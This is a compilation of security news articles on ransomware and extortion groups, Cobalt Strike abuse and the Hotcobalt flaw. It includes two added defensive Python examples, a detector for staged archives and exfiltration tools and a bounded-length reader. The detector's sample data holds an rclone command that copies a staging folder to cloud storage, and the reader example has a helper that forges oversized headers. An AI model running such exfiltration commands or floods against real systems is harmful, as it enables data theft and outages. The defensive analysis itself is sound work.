The researchers suggest Karakurt may be a trend-setter, and that similar groups may soon shift away from hitting large corporations or critical-infrastructure providers with ransomware toward a similar exfiltration and extortion approach.

"The threat group is financially motivated, opportunistic in nature, and so far, appears to target smaller companies or corporate subsidiaries versus the alternative big-game hunting approach," the report reads.

According to Accenture CIFR researchers, Karakurt was first spotted by investigators outside Accenture Security in June, when it began building out its network and data-leak infrastructure. In August the group registered the domains karakurt.group and karakurt.tech as well as the Twitter handle @karakurtlair, and shortly afterwards carried out its first successful attack.

Accenture Security's collection sources and intrusion research identified the group's first victim in September; two months later, the group published that victim on the karakurt.group website.

Karakurt's tactics, techniques, and procedures (TTPs) for breaching victim infrastructure, maintaining persistence, moving laterally, and stealing data resemble those of numerous other threat actors. The group frequently takes a "living off the land" approach, using tools and features already present on the targeted systems.

Once inside a network, Karakurt primarily maintains persistence through service installation, remote-management software, and the deployment of command-and-control (C2) beacons across the victim environment via Cobalt Strike.

However, the researchers noticed that the group recently appears to have changed its approach to backup persistence. Rather than deploying Cobalt Strike, Karakurt "persisted within the victim's network via the VPN IP pool or installed AnyDesk to allow external remote access to compromised devices," they said. This lets the gang move laterally using previously obtained user, service, and administrator credentials.

The researchers said the gang also uses additional remote-management tools, such as the remote desktop protocol (RDP), Cobalt Strike, and PowerShell commands, to move laterally and locate data worth stealing for extortion.

The group's attack pattern thus far shows that it is adaptable enough to change its techniques to fit the victim's circumstances. Karakurt can also avoid detection in many cases because it frequently uses valid credentials to access systems.

Finally, Karakurt uses 7zip and WinZip to compress data and Rclone or FileZilla (SFTP) to stage and exfiltrate it to Mega.io cloud storage. According to Accenture Security, the staging folders used for exfiltration in the observed attacks were C:\Perflogs and C:\Recovery.
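As an added example (not Accenture's code), the following Python correlates two of the observations above over constructed endpoint records: archives created in the C:\Perflogs or C:\Recovery staging folders, followed within a window by execution of rclone or FileZilla. The record format, the timestamps, the two-hour window, and the rclone path and remote name are assumptions made for this illustration.

```python
from datetime import datetime, timedelta
import ntpath

STAGING_DIRS = ("c:\\perflogs\\", "c:\\recovery\\")   # folders named in the report
ARCHIVE_EXTENSIONS = (".7z", ".zip", ".rar")
EXFIL_TOOLS = {"rclone.exe", "filezilla.exe", "winscp.exe"}
WINDOW = timedelta(hours=2)                           # assumed correlation window


def parse_event(line: str) -> dict:
    """Parse a constructed 'timestamp|Kind|Key=Value|...' endpoint record."""
    timestamp, kind, *fields = line.split("|")
    event = {"ts": datetime.fromisoformat(timestamp), "kind": kind}
    for field in fields:
        key, _, value = field.partition("=")
        event[key] = value
    return event


def is_staged_archive(event: dict) -> bool:
    target = event.get("TargetFilename", "").lower()
    return (event["kind"] == "FileCreate"
            and target.startswith(STAGING_DIRS)
            and target.endswith(ARCHIVE_EXTENSIONS))


def is_exfil_tool(event: dict) -> bool:
    return (event["kind"] == "ProcessCreate"
            and ntpath.basename(event.get("Image", "")).lower() in EXFIL_TOOLS)


def correlate(lines) -> dict:
    """Return staged archives and alerts where an exfil tool ran within WINDOW of staging."""
    events = sorted((parse_event(line) for line in lines), key=lambda e: e["ts"])
    staged, alerts = [], []
    for event in events:
        if is_staged_archive(event):
            staged.append(event)
        elif is_exfil_tool(event):
            recent = [s for s in staged if timedelta(0) <= event["ts"] - s["ts"] <= WINDOW]
            if recent:
                alerts.append({
                    "time": event["ts"].isoformat(),
                    "tool": ntpath.basename(event["Image"]).lower(),
                    "command": event.get("CommandLine", ""),
                    "archives": [s["TargetFilename"] for s in recent],
                })
    return {"staged": [s["TargetFilename"] for s in staged], "alerts": alerts}


# Constructed sample records (not real telemetry), deliberately out of order.
SAMPLE_EVENTS = [
    "2021-09-10T02:12:30|FileCreate|Image=C:\\Program Files\\7-Zip\\7z.exe|TargetFilename=C:\\Recovery\\hr.7z",
    "2021-09-10T09:00:00|FileCreate|Image=C:\\Windows\\explorer.exe|TargetFilename=C:\\Users\\alice\\Documents\\report.zip",
    "2021-09-10T02:10:00|FileCreate|Image=C:\\Program Files\\7-Zip\\7z.exe|TargetFilename=C:\\Perflogs\\finance.7z",
    "2021-09-10T03:05:00|ProcessCreate|Image=C:\\Users\\Public\\rclone.exe|CommandLine=rclone.exe copy C:\\Perflogs mega:staging",
    "2021-09-09T23:00:00|ProcessCreate|Image=C:\\Windows\\explorer.exe|CommandLine=explorer.exe",
]

if __name__ == "__main__":
    result = correlate(SAMPLE_EVENTS)
    print("staged:", result["staged"])
    for alert in result["alerts"]:
        print("ALERT", alert)
```

Archives in the staging folders with no exfil tool yet are still worth a ticket; the alert tier is reserved for the combination, which is the point in the intrusion where isolating the host still prevents the extortion leverage.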

The researchers offered standard mitigation recommendations to help enterprises avoid being breached and extorted by Karakurt, which has been known to call victims repeatedly to pressure them into paying once their data has been stolen.

Cuba Ransomware Group Compromised the Networks of at Least 49 Organizations


The FBI has issued a new warning about the Cuba ransomware, stating that the gang has compromised "49 entities in five critical infrastructure sectors" and collected at least $43.9 million in ransom payments. In an alert sent out on Friday, the FBI said the gang targets organizations in the financial, government, healthcare, manufacturing, and information technology sectors and uses the Hancitor malware to gain access to Windows systems.

The Hancitor downloader is used to deliver Cuba ransomware into victims' networks, giving the ransomware gang broader access to previously compromised corporate networks. Hancitor (also known as Chanitor) is a loader that distributes information stealers, remote access trojans (RATs), and ransomware. According to Zscaler, it was first seen spreading the Vawtrak information-stealing trojan and has since shifted to password stealers such as Pony and Ficker, as well as Cobalt Strike.

Hancitor operators gain access to their victims' systems through phishing emails and stolen credentials, by exploiting Microsoft Exchange vulnerabilities, and by breaking in via exposed Remote Desktop Protocol (RDP) services. Once access has been obtained through Hancitor, Cuba ransomware operators use legitimate Windows tools and services (for example PowerShell, PsExec, and other unspecified services) to deliver their ransomware payload remotely and encrypt files with the ".cuba" extension.

Once a victim's computer is infected, the ransomware downloads and installs a Cobalt Strike beacon along with two executable files. The attackers use the two files to harvest passwords and "write to the compromised system's temporary (TMP) file."

"Once the TMP file is uploaded, the 'krots.exe' file is deleted, and the TMP file is executed in the compromised network. The TMP file includes Application Programming Interface (API) calls related to memory injection that, once executed, deletes itself from the system. Upon deletion of the TMP file, the compromised network begins communicating with a reported malware repository located at Montenegro-based Uniform Resource Locator (URL) teoresp.com," the FBI explained. 

The FBI also shared other details of the attacks, including a sample ransom note and the email used by the attackers. Given the group's level of activity relative to better-known ransomware gangs, experts were surprised by the amount of money it has amassed. According to Emsisoft threat analyst Brett Callow, the figures show how lucrative the ransomware business is, even though the Cuba ransomware operation is not among the ten most active.

Ransomware Threat Actors on the Rise in US, Target Big Organizations


A threat actor previously linked with the Thieflock ransomware operation may now be using the emerging Yanluowang ransomware in a string of attacks against U.S. organizations. Researchers at Symantec, a division of Broadcom Software, found links between Yanluowang and Thieflock; details of Yanluowang were first published in October after it was seen used against a large firm. They believe the actor has been using the ransomware to attack financial organizations in the U.S. and has also compromised companies in manufacturing, engineering, consulting, and IT services.

The researchers noticed a probable link between the new Yanluowang attacks and earlier attacks involving Thieflock, a ransomware-as-a-service (RaaS) offering built by the Canthroid group, also known as FiveHands. This illustrates the lack of loyalty among ransomware operators, especially those working as affiliates of RaaS operations. As ThreatPost reports, "Data-capture tools are also part of the attack vector, including a screen capture tool and a file exfiltration tool (filegrab.exe), as well as Cobalt Strike Beacon, which researchers saw deployed against at least one target."

Ransomware affiliates move from one operation to another, switching based on the profit margins on offer, and there is no loyalty in the business, says Vikram Thakur, chief research manager at Symantec. The researchers summarized some of the tools used in the Yanluowang attacks, several of which they also saw in the Thieflock attacks, suggesting the actor behind them is experienced with Thieflock's deployment. "In most scenarios, attackers use PowerShell to download tools to compromised systems, including BazarLoader, which assists in reconnaissance of a system before attacks occur. The attackers then enable RDP via registry to enable remote access, deploying the legitimate remote access tool ConnectWise, formerly known as ScreenConnect, once they've gained this access," ThreatPost said.

Threat Actors Targeting Vaccine Manufacturing Facility with Tardigrade Malware


Biomanufacturing facilities in the US are being actively targeted by an anonymous hacking group leveraging a new custom malware called ‘Tardigrade’. 

In a new threat advisory, the Bioeconomy Information Sharing and Analysis Center (BIO-ISAC) said this week that the first attack using this new malware was launched in spring 2021, followed by a second assault in October.

New malware strain

According to BIO-ISAC, Tardigrade possesses advanced features and is believed to be the work of an advanced threat group or a nation-state intelligence service. The malware is primarily used for espionage, though it can also cause other problems, including network outages. The recent assaults are also believed to be linked to Covid-19 research, as the pandemic has shown how crucial biomanufacturing research is to creating vaccines and other drugs. 

Tardigrade’s functionality includes trojan and keylogger capabilities and data theft, and it also establishes a backdoor into targeted systems. There is some debate regarding the origins of the code used in Tardigrade: BIO-ISAC believes the malware is based on Smoke Loader, a Windows-based backdoor operated by a hacking group called Smoky Spider, while security researchers who spoke with Bleeping Computer believe it is a form of the Cobalt Strike HTTP Beacon. 

“The biomanufacturing industry along with other verticals are so far behind in cybersecurity, making them a prime target for bad actors. Cyberattacks mostly happen to those that provide easy access or least path of resistance,” George Gerchow, chief security officer of machine data analytics company Sumo Logic Inc., told SiliconANGLE. 

“This is a blatant example of how attackers are focusing on human health during a time of high anxiety, and bioscience is an easy target. The industry is going to have to move quickly to put proper cyber security controls in place. It is going to be a huge mountain for them to climb as some of the companies in the industry have antiquated technology, lacked the proper skill sets, and relied too much on legacy security tools,” Gerchow added. 

The BIO-ISAC report recommends the following steps for biomanufacturing sites to enhance their security and response postures: (i) scan your biomanufacturing network segmentation, (ii) collaborate with biologists and automation experts to design a foolproof analysis for your firm, (iii) employ antivirus with behavioral analysis capabilities, (iv) participate in phishing detection training, and (v) stay vigilant.

Banco Pichincha: Ecuador's Largest Bank Hit by a Cyber Attack

 

Banco Pichincha, Ecuador's biggest private bank by capitalization and depositors, has been struck by a cyberattack that has crippled its operations and left its ATMs and online banking website unavailable to users. 

The intrusion happened over the weekend, and the bank had to lock down parts of its network to prevent the attack from spreading to other systems. The bank's systems have been taken down, causing considerable inconvenience, with ATMs no longer functioning and service notifications appearing on the internet banking website. 

The bank has 1.8 million customers, $4.5 billion in assets, and $4 billion in deposits, along with over 200 offices. Banco Pichincha has subsidiaries in Peru (Banco Financiero Perú), Colombia (Banco Pichincha) and Panama (Banco Pichincha Panamá). It also has a representative office in Miami and eight in Spain, comprising two each in Madrid, Barcelona, Murcia, and Comunidad Valenciana. 

In an internal notification addressed to the bank's departments, employees were informed that bank applications, email, digital channels, and self-services would be unavailable due to a technological issue. According to the memo, self-service customers should be directed to bank teller windows for assistance during the downtime. 

Banco Pichincha published a statement on Tuesday afternoon following two days of silence over the bank's technological troubles, acknowledging that their systems were disrupted by a cyberattack. 

The statement read: "In the last few hours, we have identified a cybersecurity incident in our computer systems that has partially disabled our services. We have taken immediate actions such as isolating the potentially affected systems from the rest of our network and having cybersecurity experts assist in the investigation. 

At the moment, our network of agencies, ATMs for cash withdrawals, and payments with debit and credit cards are operational. 

This technological incident did not affect the financial performance of the bank. We reiterate our commitment to safeguard the interests of our clients and restore normal service through our digital channels in the shortest possible time. 

We call for calm to avoid generating congestion and to stay informed through the official channels of Banco Pichincha to avoid the spread of false rumors." - Banco Pichincha. 

Although the bank has not publicly disclosed the origin of the attack, insiders in the cybersecurity field say the incident is a ransomware attack in which the attackers placed a Cobalt Strike beacon on the network. 

Cobalt Strike is often used by ransomware gangs and other threat actors to obtain persistence and gain access to additional systems on a network.

Linux Implementation of Cobalt Strike Beacon Employed by Hackers in Attacks Worldwide

 

Security experts have detected an unauthorized Linux version of the Cobalt Strike Beacon, created by malicious actors, that is actively being used to attack organizations worldwide. Cobalt Strike is a legitimate penetration testing tool built for red teams (security teams that act as attackers to find weaknesses and flaws in their own organization's infrastructure). 

Cobalt Strike is often used for post-exploitation tasks by malicious attackers (it is commonly dropped in ransomware campaigns) after the planting of so-called beacons, which give persistent remote access to affected machines. Using beacons, attackers can later access compromised servers to collect data or distribute additional malware payloads. 

Over time, cybercriminals acquired cracked copies of Cobalt Strike and turned it into one of the most prevalent tools in attacks culminating in data theft and extortion. Cobalt Strike, however, has always had one limitation: it supports only Windows devices and therefore does not include Linux beacons. 

Further, in a new analysis, researchers at the security company Intezer describe how threat actors have chosen to build their own Cobalt Strike-compatible Linux beacons. Using these beacons, malicious actors can now maintain and exercise remote control over both Windows and Linux devices. 

The previously undetected variant, dubbed "Vermilion Strike", is one of the rare Linux ports of the penetration testing tool, which is typically a Windows-based red team instrument heavily used by adversaries to launch a range of targeted attacks. As a threat emulation tool, Cobalt Strike describes its Beacon payload as designed to model an advanced actor and emulate their post-exploitation actions. 

"The stealthy sample uses Cobalt Strike's command-and-control (C2) protocol when communicating to the C2 server and has remote access capabilities such as uploading files, running shell commands, and writing to files," Intezer researchers said in a report. 

Once installed, the malware runs in the background, decodes the configuration it needs to operate, fingerprints the compromised Linux device, and communicates with a remote server over DNS or HTTP to retrieve base64-encoded and AES-encrypted commands, write files, and upload files back to the server. 

"Vermilion Strike and other Linux threats remain a constant threat. The predominance of Linux servers in the cloud and its continued rise invites APTs to modify their toolsets to navigate the existing environment," the researchers said.

TrickBot Employs Bogus 1Password Installer to Launch Cobalt Strike

 

The AV-TEST Institute records around 450,000 new malicious programs (malware) and potentially unwanted applications (PUA) every day. These are thoroughly examined by its team under characteristic parameters and classified accordingly. 

Malware is a file or piece of code, typically delivered over a network, that infects, scans, exploits, or performs practically any activity an attacker desires. 

One such prevalent malware is Trickbot, first seen in 2016. Trickbot has established itself in cyberspace as a modular and multipurpose malware. Its operators initially focused on bank credential theft and then expanded their operations to attack several industries. With further advancements, Trickbot came to light for its participation in ransomware attacks using Ryuk and Conti malware. 

Recently, Trickbot has been found using a technique that installs a bogus "1Password password manager" to compromise the victim's PC and collect data from it. The first step is a password-protected Microsoft Word or Excel file with macros, which compromises the targeted device if the macros are enabled. To gather information about several computers on the network, the criminals also commonly use a bogus 1Password installer titled "Setup1.exe" to launch Cobalt Strike. 

1Password is a password manager developed by AgileBits Inc. It offers users a vault, secured by a master password processed with PBKDF2, to hold passwords, software licenses, and other confidential material. 

In this regard, the DFIR Report states, “The Trickbot payload injected itself into the system process wermgr.exe — the Windows process responsible for error reporting. The threat actor then utilized built-in Windows utilities such as net.exe, ipconfig.exe, and nltest.exe for performing internal reconnaissance. Within two minutes of the discovery activity, WDigest authentication was enabled (disabled by default in Windows 10) in the registry on the infected host. This enforces credential information to be saved in clear text in memory. Shortly after applying this registry modification, the LSASS process was dumped to disk using the Sysinternals tool ProcDump.” 

This same bogus installer also drops a file that executes the Cobalt Strike (CS) shellcode and thereby receives CS beacons. As the program allows unauthorized connections to victim systems, PowerShell commands are used to gather data about victim PCs, such as their “anti-virus state”. 

Cobalt Strike is a commercial penetration testing framework that lets an attacker deploy an agent called 'Beacon' on the victim's network. Beacon has a wide range of functions, including command execution, keylogging, file transfer, SOCKS proxying, privilege escalation, port scanning, and lateral movement. 

Meanwhile, as the researchers highlighted, the collected material was not exfiltrated and the group's motives remain uncertain. The researchers said they will continue to publish updates if further developments are observed. 

Consequently, cybersecurity researchers must look for ways to ensure that their customers' environments are protected from these techniques, as the gang can restart an attack on other networks at any time.

Detecting Cobalt Strike: Cybercrime Attacks

 

Recent research revealed that cybercriminals who employ malware often use the Cobalt Strike tool to deliver multiple payloads after surveying a compromised network. Cobalt Strike is paid penetration testing software that lets attackers deploy an agent named 'Beacon' on the targeted system. 

Beacon, Cobalt Strike's payload, is deployed on compromised hosts and communicates with its command-and-control (C2) server using profiles designed to make the traffic appear legitimate. Beacon provides many functions to attackers, including keylogging, SOCKS proxying, file transfer, privilege escalation, port scanning, Mimikatz, and lateral movement. 

Cobalt Strike comes with a toolkit for developing shellcode loaders, named Artifact Kit. The Cobalt Strike toolkit is used by both the security community and cybercriminals. 

Secureworks Counter Threat Unit (CTU) researchers investigated the use of Cobalt Strike to learn when and how the tool has been used by threat actors. The resulting information helps organizations secure their systems against those actors. 

Having a comprehensive understanding of a threat actor's end goal is essential when securing a system. For instance, the financially motivated GOLD LAGOON cybercriminal group uses the Qakbot botnet to drop Cobalt Strike onto victims’ machines. CTU researchers learned that GOLD LAGOON deploys Cobalt Strike to Qakbot-infected hosts that are often identified as members of an Active Directory domain. The group, active since 2007, also facilitates other cybercriminal groups that drop various ransomware families into compromised networks. 

Early detection of a compromised network helps defenders recover or fix victims’ systems as soon as possible, as highlighted by two similar incidents. 

In the first incident, Secureworks incident responders helped the victim recover from a REvil ransomware attack. In the second, Secureworks Taegis™ XDR countermeasures detected and alerted on the malicious Qakbot and Cobalt Strike activity, enabling network defenders to mitigate the intrusion before the ransomware was deployed. However, the availability of cracked Cobalt Strike versions on the dark web gives threat actors the opportunity to misuse it.

Latest Cobalt Strike Vulnerability Allows Takedown of Hacker Servers

 

Cybersecurity experts have found a Cobalt Strike denial-of-service (DoS) vulnerability that allows blocking Beacon command-and-control (C2) communication and new beacon deployments. Cobalt Strike is a legitimate penetration testing tool built to act as an attack framework for red teams. A red team is a group of cybersecurity analysts who act as threat actors against their own organization to find security vulnerabilities and exploitable flaws. But Cobalt Strike is also used by hackers, who generally use it for post-exploitation tasks after planting beacons, which give them persistent remote access to compromised devices. With the help of these beacons, threat actors can later use the compromised servers to deploy second-stage malware payloads or harvest data. 

SentinelLabs, the research team at SentinelOne, found the DoS vulnerabilities, tracked as CVE-2021-36798 and named "Hotcobalt", in the most recent versions of the Cobalt Strike server. SentinelLabs reports: "when a Beacon stager runs, it gathers information about the computer it is running on (CPU architecture, keyboard layout, internal IP, etc.), encrypts that info using the public key, and sends it to the server in an HTTP GET request. Receiving tasks generally happens over HTTP GET requests and the Beacon replies with the task data over HTTP POST requests. Tasks are encrypted using an AES key sent by the Beacon in the registration request." 

The research revealed that one can register fake beacons with a particular Cobalt Strike server installation and then send it fake tasks or screenshots with very large declared file sizes. Using this process, an attacker could exhaust the server's available memory and crash it. A crashed server leaves already-installed beacons unable to communicate with their C2 server and prevents new beacons from being installed on compromised systems. 
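The failure mode behind Hotcobalt is a server that sizes an allocation from a length the peer declares. The following is an added example, not Cobalt Strike's code or SentinelLabs' proof of concept: a reader that trusts the declared length beside a hardened reader that rejects oversize claims before allocating and reads the body incrementally. The 4-byte length-prefix framing and the 4 MiB cap are assumptions made for the demo.

```python
"""Memory-exhaustion pattern behind CVE-2021-36798, as an added example that is
not Cobalt Strike's code: a reader that trusts a client-declared payload length
versus one that bounds it. The framing (4-byte big-endian length prefix) and the
4 MiB cap are assumptions made for this demo."""
import io
import struct

MAX_TASK_REPLY = 4 * 1024 * 1024   # assumed policy cap for one task reply

class ReplyTooLarge(ValueError):
    """Peer declared more bytes than policy allows."""

def frame(payload):
    """Build a well-formed frame: length prefix followed by the body."""
    return struct.pack(">I", len(payload)) + payload

def forged_header(declared):
    """Header claiming `declared` bytes with no body, as a fake beacon might send."""
    return struct.pack(">I", declared)

def read_reply_unbounded(stream):
    """Vulnerable pattern: allocation is sized by the peer's claim alone."""
    (size,) = struct.unpack(">I", stream.read(4))
    buf = bytearray(size)          # 0xFFFFFFFF here means a ~4 GiB allocation
    stream.readinto(buf)
    return bytes(buf)

def read_reply_bounded(stream, limit=MAX_TASK_REPLY, chunk=64 * 1024):
    """Hardened pattern: reject oversize claims before allocating, then read
    incrementally so a short body fails fast instead of blocking."""
    header = stream.read(4)
    if len(header) != 4:
        raise ValueError("truncated header")
    (size,) = struct.unpack(">I", header)
    if size > limit:
        raise ReplyTooLarge(f"declared {size} bytes exceeds limit {limit}")
    out = bytearray()
    while len(out) < size:
        piece = stream.read(min(chunk, size - len(out)))
        if not piece:
            raise ValueError("truncated body")
        out.extend(piece)
    return bytes(out)

def handle_reply(data, limit=MAX_TASK_REPLY):
    """Run the bounded reader over in-memory bytes; returns (status, payload)."""
    try:
        return ("ok", read_reply_bounded(io.BytesIO(data), limit))
    except ReplyTooLarge:
        return ("too_large", None)
    except ValueError:
        return ("truncated", None)

def declared_size(data):
    """Bytes the unbounded reader would allocate for this frame (no allocation)."""
    return struct.unpack(">I", data[:4])[0]
```

A per-beacon cap like this is the generic fix for the class of bug; the actual patched Cobalt Strike behaviour is not shown here.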

Besides this, it also interferes with red team engagements and malicious attacks that rely on the planted beacons. "One of the most famous features of Cobalt Strike is its Malleable C2. In short, this feature lets the attacker encode (“transform” in Cobalt’s language) all the beacon’s HTTP communications. The entire process described above is wrapped in the chosen Malleable profile’s transformation steps, which are also embedded in the stager itself," said SentinelLabs in its blog.